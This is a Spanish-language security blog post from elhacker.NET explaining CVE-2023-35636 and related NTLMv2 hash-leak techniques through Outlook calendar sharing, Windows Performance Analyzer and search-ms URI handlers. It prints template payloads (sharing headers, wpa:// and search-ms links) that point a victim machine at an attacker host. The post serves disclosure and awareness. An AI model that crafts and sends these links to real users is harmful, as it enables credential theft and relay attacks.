Tienda Wifi

Tienda Wifi
CiudadWireless es la tienda Wifi recomendada por elhacker.NET

Entradas Mensuales

Síguenos en:

Canal Oficial Telegram de elhacker.NET Grupo Facebook elhacker.NET Twitter elhacker.NET Canal Youtube elhacker.NET Comunidad Steam: Grupo elhacker.NET Mastodon

Entradas populares

PostHeaderIcon Vulnerabilidad en Microsoft Outlook permite extracción hashes contraseñas NTLM v2


Se ha identificado una nueva vulnerabilidad de Outlook que puede utilizarse para extraer hashes NTLMv2 explotando Outlook, Windows Performance Analyzer (WPA) y Windows File Explorer.

 




  • Esta vulnerabilidad ha sido asignada con CVE-2023-35636, y la severidad ha sido dada como 6.5 (Media).
  • Esta vulnerabilidad fue reportada a Microsoft en julio de 2023, y tomaron medidas parcheando el WPA y el Explorador de Archivos con "Severidad Moderada".

Microsoft ha parcheado completamente esta vulnerabilidad en diciembre de 2023. Sin embargo, los sistemas no parcheados siguen siendo vulnerables a la explotación y el robo de contraseñas cifradas.
Fallo de Outlook - CVE-2023-35636



Esta vulnerabilidad es un exploit de la función de compartir calendario en Outlook, que, si se añaden dos cabeceras adicionales, puede resultar en dirigir Outlook para conectarse y compartir contenido a una máquina externa. Esta conectividad puede ser utilizada para interceptar el hash NTLMv2.

Supongamos que un atacante consigue extraer los hashes de NTLM v3. En ese caso, hay dos posibles métodos de ataque, que son los ataques de fuerza bruta sin conexión, que pueden revelar la contraseña original, y los ataques de retransmisión de autenticación, en los que una solicitud de autenticación a un servidor puede ser manipulada por el atacante con el hash NTLMv2 y conseguir autenticarse en el servidor bajo el nombre de la víctima. 




Filtración de hashes NTLM v2 utilizando Outlook


Outlook es la herramienta de correo electrónico y calendario de la suite Microsoft 365, utilizada por millones de personas y organizaciones en todo el mundo.

Una de sus características principales es el uso compartido de calendarios entre usuarios, que puede ser explotado para desencadenar un intento de autenticación que puede resultar en la redirección de la contraseña con hash al servidor del atacante.

Las cabeceras que pueden utilizarse para la explotación son,

  •     "Content-Class" = "Sharing" - indica a Outlook que este correo electrónico contiene contenido para compartir.
  •     "x-sharing-config-url" = \(máquina del atacante)\a.ics - dirige el Outlook de la víctima a la máquina del atacante.


Filtrando Hashes NTLM v2 usando URI Handlers


Windows Performance Analyzer (WPA), la característica por defecto en Windows, realiza una acción para instalar un manejador URI para WPA:// por defecto, que permite al programa lanzarse automáticamente cuando un usuario hace clic en un enlace relacionado con WPA.

Además, esta función utiliza hashes NTLM v2 para la autenticación a través de la web abierta. Esto hace que sea vulnerable a ataques de fuerza bruta de retransmisión y fuera de línea.

Para explotar esta WPA, el actor de la amenaza puede enviar una carga útil que tendrá tres partes.

Carga útil completa:

wpa:////<IP del atacante>/bla
wpa:// - indica al sistema operativo que este enlace debe abrirse en WPA.
//<IP del atacante> - indica a la máquina de la víctima que acceda a la máquina del atacante a través de SMB.
/bla - indica a la máquina de la víctima a qué archivo debe acceder.

Filtrando Hashes NTLM v2 usando el Explorador de Archivos de Windows


Existe un handle URI "search-ms" que activa la función de búsqueda del explorer.exe y apunta al proceso explorer.exe a la web. Este explorer.exe es uno de los procesos más potentes del sistema operativo Windows, que tiene varias capacidades para explorar archivos y carpetas, copiar y mover archivos, y crear y eliminar carpetas.

Sin embargo, como parte de la explotación, había dos parámetros identificados como parte de la documentación de Microsoft: "subquery" y "crumb". Para la explotación con el parámetro "subquery", se puede utilizar el siguiente payload

  •     search-ms://query=poc&subquery=\(Máquina atacante)\poc.search-ms
  •     search-ms:// - indica al sistema operativo que este enlace debe abrirse en exe.
  •     query=poc - Consulta de búsqueda falsa
  •     &subquery=\(Máquina atacante)\poc.search-ms - Ruta al archivo .search-ms.


Para la explotación con el parámetro "crumb", se puede utilizar la siguiente carga útil,

search-ms://query=poc&crumb=location:\\(Máquina atacante)

  •     search-ms:// - indica al sistema operativo que este enlace debe abrirse en exe.
  •     query=poc - Consulta de búsqueda falsa
  •     crumb=location:\\\(Máquina atacante) - La propiedad location bajo el parámetro crumb permite al usuario especificar una ruta para la búsqueda.


Fuentes:

https://gbhackers.com/outlook-flaw-hashed-passwords/

https://www.varonis.com/blog/outlook-vulnerability-new-ways-to-leak-ntlm-hashes


0 comentarios :

Publicar un comentario

Los comentarios pueden ser revisados en cualquier momento por los moderadores.

Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.

Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.